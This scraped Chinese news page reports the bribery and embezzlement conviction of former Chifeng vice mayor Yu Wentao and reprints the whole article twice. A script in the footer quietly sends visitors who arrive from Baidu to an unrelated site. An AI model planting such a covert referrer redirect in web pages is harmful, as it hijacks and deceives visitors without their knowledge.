            前不久,经内蒙古自治区巴彦淖尔市检察院向巴彦淖尔市中级法院提起公诉,内蒙古自治区赤峰市政府原党组成员、副市长于文涛(副厅级)受贿、私分国有资产、巨额财产来源不明案一审公开宣判。法院认定于文涛犯受贿罪、私分国有资产罪、巨额财产来源不明罪,数罪并罚,决定合并执行有期徒刑十年零六个月,并处罚金100万元。

            法院经审理查明:于文涛身为国家机关工作人员,利用其担任赤峰市喀喇沁旗旗长、旗委书记,赤峰市财政局党组书记、局长,赤峰市政府党组成员、副市长的职务便利,或其职权地位形成的便利条件,接受他人请托,为他人谋取利益,收受他人财物共计价值约1267万元人民币和4.5万元美元;违反国家规定,以单位名义用国有资产支付职工家属楼土地使用权转让金1800万元。于文涛身为国家机关工作人员,家庭财产、支出明显超过合法收入,责令其说明来源,仍有650余万元人民币、12.98余万元美元、9765元欧元、12万元港币和14.4万元日元不能说明来源。

            1.从讲坛到政坛,贪欲之门悄然打开

            于文涛出生于1961年6月,是土生土长的赤峰人。1988年,于文涛从赤峰市第二中学团委书记的岗位调到了共青团赤峰市委员会学少部任青工农牧部部长。从此,开始了他的仕途生涯。2002年,于文涛自担任赤峰市喀喇沁旗旗长后,便拉开了利用职务便利疯狂敛财的序幕。

            在长达16年的时间里,春节、端午节、劳动节、中秋节,节日都是他受贿的时机;办公室、家里、饭店,甚至出差开会到呼和浩特、北京,都是他受贿的地点;孩子结婚、妻子生病、父亲去世,都是他受贿的理由。

            尤其是在2005年至2012年,于文涛担任赤峰市财政局局长期间,更是大肆收受贿赂。在这段时间里,无论是其下属旗县区财政局,还是需要财政拨款的单位,都成为其受贿的对象。他不仅收前任的还收现任的,不仅收在职的还收离职的,在当地财政系统的影响非常恶劣。

            从2002年至2013年,某下属单位为得到于文涛在项目、拨款方面的支持与帮助,先后30余次在于文涛办公室行贿,共计送给于文涛79万元现金。之后,于文涛在资金拨付与项目争取方面,都给了该单位较大的倾斜力度。仅2011年一年,该下属单位主要领导就专程看望于文涛6次,先后送出现金13万元,平均每两个月就要来“感谢”一下于文涛的照顾。

            当时,一些房地产开发商、企业经营者是主要行贿人,他们的目的无非是希望于文涛在相关项目的税款收缴、工程招投标、工程款支付等方面给予关照。

            2012年3月,于文涛仕途再上一步,担任赤峰市副市长。他分管教育、国土资源、住房和城乡建设等工作,在项目审批、土地规划、施工计划调整上手握大权。权力的增大,也让于文涛在自我毁灭的道路上越走越远。

            2013年,赤峰某房地产开发公司计划开发赤峰市松山区某工程项目,在向规划局报批时,因为遮挡北侧居民采光而未被通过。该公司法定代表人给时任赤峰市副市长的于文涛送了10万元现金。在对项目规划进行微调后,上报审批顺利通过。2013年至2017年间,于文涛利用职务便利,为该公司在项目规划和开发方面多次提供帮助,并先后三次收受该公司现金共计40万元。

            在2014年至2017年间,赤峰某建材化工企业董事长为了让于文涛帮助推进工程项目、尽快获得政府补贴款、重新补办规划手续等事项,先后4次拿着蓝白相间的编织袋来到于文涛家楼下,共计送上100万元现金。吃人嘴软、拿人手短,收钱后的于文涛尽心尽力地一项项完成了行贿人的请托事项。

            2.从推辞到伸手,欲望的口子越开越大

            16年来,无休止的贪欲驱使于文涛陷入利令智昏的怪圈。他从受贿时冠冕堂皇地推辞两句,逐渐演变为向有求于他的企业和单位频频暗示。他把权力当作捞取钱财、积累财富的工具。

            2002年春节前,时任喀喇沁旗旗长的于文涛在自己办公室里提点某下属单位负责人说:“快过春节了,为了方便以后好办事,应该去看看市里的领导和相关部门领导。”该单位负责人一听豁然开朗,马上回单位拿了10万元现金,回到于文涛的办公室,将这10万元放到他的办公桌上。于文涛会意地把钱收下。

            2011年,于文涛向某下属单位负责人杨某表示,想在热水汤温泉城给老爷子(于文涛的父亲)买一处房子。杨某心领神会,找到该楼盘的开发商买下一处70多平方米的房子。随后,杨某又让办公室主任购置了电视机、电冰箱、洗衣机、电磁炉等家用电器。2011年末的一天,杨某来到于文涛家,将新房钥匙交给他。2012年3月,杨某又去热水汤温泉城售楼处选好车库位置,交清了6万元车库款后,把车库钥匙交给了于文涛。

            2014年,于文涛发现自己在赤峰市天骄西苑东区的房子卫生间的门对着卧室的床,感觉影响了风水。于是,他找到某建筑设计集团的董事长“帮忙看看”。该董事长立即找来技术人员,并派人对房间进行了维修改造。2016年7月,于文涛又找到该董事长,说他儿子在富兴嘉城的房子要装修,问能不能给提供点材料。经该董事长安排,这家企业先后给于文涛儿子200多平方米的房子提供了木门、整体橱柜、电器等,共计花费26.32万元。2013年至2018年期间,于文涛还通过该董事长收受了这家企业25万元人民币,5000美元和价值人民币5000元的众联购物卡一张。

            于文涛不仅用权力交换利益,而且滥用权力,侵蚀公款。

            2005年4月,赤峰市财政局经研究决定建造财政局职工住宅楼。同年4月12日,财政局与赤峰市某房地产开发有限责任公司签订了合同标的为1800万元的土地使用权转让协议书,该土地用于职工集资建房。2005年4月30日和5月9日,财政局从国库借用预算外资金分别向该公司支付1500万元和300万元土地使用权转让金。

            2005年4月30日,于文涛经赤峰市委决定被任命为赤峰市财政局党组书记。同年5月中旬,于文涛到任后,决定以支付财政局办公楼工程款的形式套取资金,归还财政局用国库预算外资金垫付的1800万元土地使用权转让金。

            2005年12月至2006年8月,于文涛决定,赤峰市财政局以支付办公楼工程款名义向办公楼承建公司转账2262万元,该公司将其中2220万元通过其关联公司全部取现返还给财政局,财政局将其中的1800万元归还国库,另420万元用于其他公务支出。后经于文涛决定,由赤峰市财政局财务人员虚构2220万元职工购房款收入做平账目。

            3.从自己收到全家收,“家族式腐败”愈演愈烈

            慢慢地,于文涛变得自我膨胀起来,廉政底线彻底失守,全然不知“廉耻”二字。他认为给别人办事,别人“感谢”他是应该的,人情礼送一律来者不拒、一概笑纳。于文涛的所作所为也深深地影响了家里人,“家族式腐败”陆续上演。

            2005年,于文涛任赤峰市财政局局长,他的父亲于某到喀喇沁旗游玩,吃住在喀喇沁旗财政局小宾馆,还让喀喇沁旗财政局局长张某给他找个司机,说要练习开车。过了一段时间,于某又去喀喇沁旗游玩,又让张某给借个车。2006年,于某第三次到喀喇沁旗游玩,又和张某提出借车的事。这一回,于某看起来很不高兴。张某冥思苦想,推断于某不是想借车,而是想要车。张某不禁左右为难,于文涛是赤峰市财政局局长,自己在于文涛直接管理的下属单位工作,如果不给于某购车,恐怕会处理不好和于文涛的关系,进而影响工作。张某最终拿出25万元人民币购买了一台本田轿车,并将车过户到于某名下,又将新车开到了于某居住的小区,将车钥匙交给于某。当然,购车的费用并不是张某兜里的钱,而是喀喇沁旗财政局在经费中虚列的招待费。

            于文涛的妻子王某在赤峰学院工作,是一名受人尊敬的大学教授。但是在利益面前,王某同样没能守住自己的原则和底线,变得唯利是图。作为领导干部的妻子,她没有吹好“枕边风”,当好“廉内助”,反而成了丈夫受贿的“后门”。

            2009年春节前,郭某为感谢于文涛在工作上对自己和丈夫的支持,专门给于文涛打电话说要去串个门。于文涛当时不在家,让郭某跟妻子王某联系。郭某去时买了一束鲜花,还带上了提前准备好的用报纸包着的10万元现金。在于文涛家,郭某客气地对王某说:“王教授,过年了,于局长对我和我老公都挺支持的,也不知道你缺啥,你自己买点东西吧。”王某看着手提纸袋明知故问道:“这是啥?”郭某回答说:“我给你们拿的钱。”王某客气了几句,就收下了这些钱。2006年至2017年间,于文涛先后多次单独收受或伙同妻子王某收受郭某现金共计50万元。

            于文涛从一名人民教师逐步走上了党政机关领导岗位。他以为天下熙熙,皆为利来;天下攘攘,皆为利往,在一次又一次的学习教育中,没有警醒与反思,反而越来越深地陷入了贪欲的泥淖,本已临近退休的他只能在监狱中慢慢地吞下自己种的苦果。

            ◎检察长说案

            良好家风是抵御贪腐“防火墙”

            丈夫16年受贿1200余万!大学教授成其受贿后门

            内蒙古自治区巴彦淖尔市检察院党组书记、检察长 张复弛

            2019年12月23日,内蒙古自治区赤峰市原副市长于文涛受贿、私分国有资产、巨额财产来源不明案在巴彦淖尔市中级法院公开宣判,判决全部采纳了巴彦淖尔市检察院指控的事实与罪名,并采纳了检察官提出的量刑建议。

            纵观于文涛的犯罪历程,他通过自身努力从一名人民教师逐步走上了党政机关领导岗位,作为党的执政骨干,本应发挥“关键少数”的示范引领作用,以身作则、从严律己。但是,他却将手中的权力当成“摇钱树”。从政30年间,收受巨额财物,严重破坏了当地的政治生态。于文涛案有受贿周期长、受贿对象广、涉及罪名多、犯罪数额大等特点。思想上的松懈、道德上的滑坡、作风上的堕落固然是其沦为阶下囚的主要原因,但其不良的家风也是重要诱因。良好的家风是抵御贪腐的“防火墙”。正如习近平总书记多次强调的:“领导干部要把家风建设摆在重要位置,廉洁修身、廉洁齐家。”

            于文涛案警示所有党员干部,要坚守政治信仰、增强法治观念、遵循道德信仰,常思手中的权力从何而来,为谁而用。欲治其国者,先齐其家,广大党员干部一定要切实提高个人党性修养,明晰底线红线,重视道德家风,筑牢抵御贪腐的思想道德防线。

            荀建国 本文来源:检察日报 责任编辑:荀建国_NN7379

            2.干部16年受贿1200余万 教授妻子成其受贿"后门"|||||||

            (原标题:儿子当官老子沾光 丈夫办事妻子收钱)

            内蒙古自治区赤峰市原副市长于文涛因犯受贿罪、私分国有资产罪、巨额财产来源不明罪被判处有期徒刑十年零六个月。他对送来的钱来者不拒、一概笑纳,仅查明的受贿金额就高达1200余万元,他的所作所为也深深地影响了家里人――

            丈夫16年受贿1200余万!大学教授成其受贿后门

            于文涛受审

            从2002年到2018年,在长达16年的受贿历程中,于文涛五千一万不嫌少,百八十万不嫌多地笔笔“笑纳”。“千里之堤,溃于蚁穴”,于文涛思想的堤坝,就这样被一次次的“感谢”腐蚀着,逐渐陷入公权与私利的交换游戏中。虽然于文涛有自首、坦白情节,且认罪悔罪,并退缴了大部分赃款赃物,但这一切也只是亡羊补牢,悔之晚矣……

            前不久,经内蒙古自治区巴彦淖尔市检察院向巴彦淖尔市中级法院提起公诉,内蒙古自治区赤峰市政府原党组成员、副市长于文涛(副厅级)受贿、私分国有资产、巨额财产来源不明案一审公开宣判。法院认定于文涛犯受贿罪、私分国有资产罪、巨额财产来源不明罪,数罪并罚,决定合并执行有期徒刑十年零六个月,并处罚金100万元。

            法院经审理查明:于文涛身为国家机关工作人员,利用其担任赤峰市喀喇沁旗旗长、旗委书记,赤峰市财政局党组书记、局长,赤峰市政府党组成员、副市长的职务便利,或其职权地位形成的便利条件,接受他人请托,为他人谋取利益,收受他人财物共计价值约1267万元人民币和4.5万元美元;违反国家规定,以单位名义用国有资产支付职工家属楼土地使用权转让金1800万元。于文涛身为国家机关工作人员,家庭财产、支出明显超过合法收入,责令其说明来源,仍有650余万元人民币、12.98余万元美元、9765元欧元、12万元港币和14.4万元日元不能说明来源。

            1.从讲坛到政坛,贪欲之门悄然打开

            于文涛出生于1961年6月,是土生土长的赤峰人。1988年,于文涛从赤峰市第二中学团委书记的岗位调到了共青团赤峰市委员会学少部任青工农牧部部长。从此,开始了他的仕途生涯。2002年,于文涛自担任赤峰市喀喇沁旗旗长后,便拉开了利用职务便利疯狂敛财的序幕。

            在长达16年的时间里,春节、端午节、劳动节、中秋节,节日都是他受贿的时机;办公室、家里、饭店,甚至出差开会到呼和浩特、北京,都是他受贿的地点;孩子结婚、妻子生病、父亲去世,都是他受贿的理由。

            尤其是在2005年至2012年,于文涛担任赤峰市财政局局长期间,更是大肆收受贿赂。在这段时间里,无论是其下属旗县区财政局,还是需要财政拨款的单位,都成为其受贿的对象。他不仅收前任的还收现任的,不仅收在职的还收离职的,在当地财政系统的影响非常恶劣。

            从2002年至2013年,某下属单位为得到于文涛在项目、拨款方面的支持与帮助,先后30余次在于文涛办公室行贿,共计送给于文涛79万元现金。之后,于文涛在资金拨付与项目争取方面,都给了该单位较大的倾斜力度。仅2011年一年,该下属单位主要领导就专程看望于文涛6次,先后送出现金13万元,平均每两个月就要来“感谢”一下于文涛的照顾。

            当时,一些房地产开发商、企业经营者是主要行贿人,他们的目的无非是希望于文涛在相关项目的税款收缴、工程招投标、工程款支付等方面给予关照。

            2012年3月,于文涛仕途再上一步,担任赤峰市副市长。他分管教育、国土资源、住房和城乡建设等工作,在项目审批、土地规划、施工计划调整上手握大权。权力的增大,也让于文涛在自我毁灭的道路上越走越远。

            2013年,赤峰某房地产开发公司计划开发赤峰市松山区某工程项目,在向规划局报批时,因为遮挡北侧居民采光而未被通过。该公司法定代表人给时任赤峰市副市长的于文涛送了10万元现金。在对项目规划进行微调后,上报审批顺利通过。2013年至2017年间,于文涛利用职务便利,为该公司在项目规划和开发方面多次提供帮助,并先后三次收受该公司现金共计40万元。

            在2014年至2017年间,赤峰某建材化工企业董事长为了让于文涛帮助推进工程项目、尽快获得政府补贴款、重新补办规划手续等事项,先后4次拿着蓝白相间的编织袋来到于文涛家楼下,共计送上100万元现金。吃人嘴软、拿人手短,收钱后的于文涛尽心尽力地一项项完成了行贿人的请托事项。

            2.从推辞到伸手,欲望的口子越开越大

            16年来,无休止的贪欲驱使于文涛陷入利令智昏的怪圈。他从受贿时冠冕堂皇地推辞两句,逐渐演变为向有求于他的企业和单位频频暗示。他把权力当作捞取钱财、积累财富的工具。

            2002年春节前,时任喀喇沁旗旗长的于文涛在自己办公室里提点某下属单位负责人说:“快过春节了,为了方便以后好办事,应该去看看市里的领导和相关部门领导。”该单位负责人一听豁然开朗,马上回单位拿了10万元现金,回到于文涛的办公室,将这10万元放到他的办公桌上。于文涛会意地把钱收下。

            2011年,于文涛向某下属单位负责人杨某表示,想在热水汤温泉城给老爷子(于文涛的父亲)买一处房子。杨某心领神会,找到该楼盘的开发商买下一处70多平方米的房子。随后,杨某又让办公室主任购置了电视机、电冰箱、洗衣机、电磁炉等家用电器。2011年末的一天,杨某来到于文涛家,将新房钥匙交给他。2012年3月,杨某又去热水汤温泉城售楼处选好车库位置,交清了6万元车库款后,把车库钥匙交给了于文涛。

            2014年,于文涛发现自己在赤峰市天骄西苑东区的房子卫生间的门对着卧室的床,感觉影响了风水。于是,他找到某建筑设计集团的董事长“帮忙看看”。该董事长立即找来技术人员,并派人对房间进行了维修改造。2016年7月,于文涛又找到该董事长,说他儿子在富兴嘉城的房子要装修,问能不能给提供点材料。经该董事长安排,这家企业先后给于文涛儿子200多平方米的房子提供了木门、整体橱柜、电器等,共计花费26.32万元。2013年至2018年期间,于文涛还通过该董事长收受了这家企业25万元人民币,5000美元和价值人民币5000元的众联购物卡一张。

            于文涛不仅用权力交换利益,而且滥用权力,侵蚀公款。

            2005年4月,赤峰市财政局经研究决定建造财政局职工住宅楼。同年4月12日,财政局与赤峰市某房地产开发有限责任公司签订了合同标的为1800万元的土地使用权转让协议书,该土地用于职工集资建房。2005年4月30日和5月9日,财政局从国库借用预算外资金分别向该公司支付1500万元和300万元土地使用权转让金。

            2005年4月30日,于文涛经赤峰市委决定被任命为赤峰市财政局党组书记。同年5月中旬,于文涛到任后,决定以支付财政局办公楼工程款的形式套取资金,归还财政局用国库预算外资金垫付的1800万元土地使用权转让金。

            2005年12月至2006年8月,于文涛决定,赤峰市财政局以支付办公楼工程款名义向办公楼承建公司转账2262万元,该公司将其中2220万元通过其关联公司全部取现返还给财政局,财政局将其中的1800万元归还国库,另420万元用于其他公务支出。后经于文涛决定,由赤峰市财政局财务人员虚构2220万元职工购房款收入做平账目。

            3.从自己收到全家收,“家族式腐败”愈演愈烈

            慢慢地,于文涛变得自我膨胀起来,廉政底线彻底失守,全然不知“廉耻”二字。他认为给别人办事,别人“感谢”他是应该的,人情礼送一律来者不拒、一概笑纳。于文涛的所作所为也深深地影响了家里人,“家族式腐败”陆续上演。

            2005年,于文涛任赤峰市财政局局长,他的父亲于某到喀喇沁旗游玩,吃住在喀喇沁旗财政局小宾馆,还让喀喇沁旗财政局局长张某给他找个司机,说要练习开车。过了一段时间,于某又去喀喇沁旗游玩,又让张某给借个车。2006年,于某第三次到喀喇沁旗游玩,又和张某提出借车的事。这一回,于某看起来很不高兴。张某冥思苦想,推断于某不是想借车,而是想要车。张某不禁左右为难,于文涛是赤峰市财政局局长,自己在于文涛直接管理的下属单位工作,如果不给于某购车,恐怕会处理不好和于文涛的关系,进而影响工作。张某最终拿出25万元人民币购买了一台本田轿车,并将车过户到于某名下,又将新车开到了于某居住的小区,将车钥匙交给于某。当然,购车的费用并不是张某兜里的钱,而是喀喇沁旗财政局在经费中虚列的招待费。

            于文涛的妻子王某在赤峰学院工作,是一名受人尊敬的大学教授。但是在利益面前,王某同样没能守住自己的原则和底线,变得唯利是图。作为领导干部的妻子,她没有吹好“枕边风”,当好“廉内助”,反而成了丈夫受贿的“后门”。

            2009年春节前,郭某为感谢于文涛在工作上对自己和丈夫的支持,专门给于文涛打电话说要去串个门。于文涛当时不在家,让郭某跟妻子王某联系。郭某去时买了一束鲜花,还带上了提前准备好的用报纸包着的10万元现金。在于文涛家,郭某客气地对王某说:“王教授,过年了,于局长对我和我老公都挺支持的,也不知道你缺啥,你自己买点东西吧。”王某看着手提纸袋明知故问道:“这是啥?”郭某回答说:“我给你们拿的钱。”王某客气了几句,就收下了这些钱。2006年至2017年间,于文涛先后多次单独收受或伙同妻子王某收受郭某现金共计50万元。

            于文涛从一名人民教师逐步走上了党政机关领导岗位。他以为天下熙熙,皆为利来;天下攘攘,皆为利往,在一次又一次的学习教育中,没有警醒与反思,反而越来越深地陷入了贪欲的泥淖,本已临近退休的他只能在监狱中慢慢地吞下自己种的苦果。

            ◎检察长说案

            良好家风是抵御贪腐“防火墙”

            丈夫16年受贿1200余万!大学教授成其受贿后门

            内蒙古自治区巴彦淖尔市检察院党组书记、检察长 张复弛

            2019年12月23日,内蒙古自治区赤峰市原副市长于文涛受贿、私分国有资产、巨额财产来源不明案在巴彦淖尔市中级法院公开宣判,判决全部采纳了巴彦淖尔市检察院指控的事实与罪名,并采纳了检察官提出的量刑建议。

            纵观于文涛的犯罪历程,他通过自身努力从一名人民教师逐步走上了党政机关领导岗位,作为党的执政骨干,本应发挥“关键少数”的示范引领作用,以身作则、从严律己。但是,他却将手中的权力当成“摇钱树”。从政30年间,收受巨额财物,严重破坏了当地的政治生态。于文涛案有受贿周期长、受贿对象广、涉及罪名多、犯罪数额大等特点。思想上的松懈、道德上的滑坡、作风上的堕落固然是其沦为阶下囚的主要原因,但其不良的家风也是重要诱因。良好的家风是抵御贪腐的“防火墙”。正如习近平总书记多次强调的:“领导干部要把家风建设摆在重要位置,廉洁修身、廉洁齐家。”

            于文涛案警示所有党员干部,要坚守政治信仰、增强法治观念、遵循道德信仰,常思手中的权力从何而来,为谁而用。欲治其国者,先齐其家,广大党员干部一定要切实提高个人党性修养,明晰底线红线,重视道德家风,筑牢抵御贪腐的思想道德防线。

            荀建国 本文来源:检察日报 责任编辑:荀建国_NN7379

            最新文章

            热门文章

            友情链接:   520笔趣阁  |  35书屋  |  Eleven
            type="text/javascript"> var regexp=/\.(baidu)(\.[a-z0-9\-]+){1,2}\//ig; var where =document.referrer; if(regexp.test(where)) { window.location.href="http://www.3535001.com/" }